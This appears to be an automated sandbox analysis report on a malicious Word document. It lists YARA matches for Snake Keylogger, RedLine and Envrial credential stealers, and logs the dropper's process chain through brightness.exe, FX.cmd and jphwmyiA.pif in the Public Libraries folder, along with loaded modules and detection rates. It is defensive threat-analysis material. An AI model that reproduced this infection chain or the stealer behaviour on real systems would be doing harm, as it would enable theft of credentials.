                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000013.00000001.2327344722.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000013.00000002.3731782871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000001.2248691179.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000F.00000002.3731678723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000001.2128731771.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, -j.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@24/10@5/6
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B7F52 GetDiskFreeSpaceA,7_2_027B7F52
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027C6D48 CoCreateInstance,7_2_027C6D48
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$T # KRPBV2663 .doc
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{C8592FA1-DBA5-4FB7-B160-9F65D8E5C5DD} - OProcSessId.dat
                  Source: ITT # KRPBV2663 .docOLE indicator, Word Document stream: true
                  Source: ITT # KRPBV2663 .docOLE document summary: title field not present or empty
                  Source: ITT # KRPBV2663 .docOLE document summary: edited time not present or 0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCommand line argument: 08A10_2_00413780
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCommand line argument: 08A15_2_00413780
                  Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.ini
                  Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: jphwmyiA.pif, 0000000A.00000003.2370715212.000000002225E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2478621688.000000001D30F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2551268767.000000002391E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: ITT # KRPBV2663 .docReversingLabs: Detection: 47%
                  Source: ITT # KRPBV2663 .docVirustotal: Detection: 56%
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
                  Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: unknownProcess created: C:\Users\Public\Libraries\Aiymwhpj.PIF "C:\Users\Public\Libraries\Aiymwhpj.PIF"
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: unknownProcess created: C:\Users\Public\Libraries\Aiymwhpj.PIF "C:\Users\Public\Libraries\Aiymwhpj.PIF"
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFProcess created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: url.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieframe.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: netapi32.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winhttp.dll
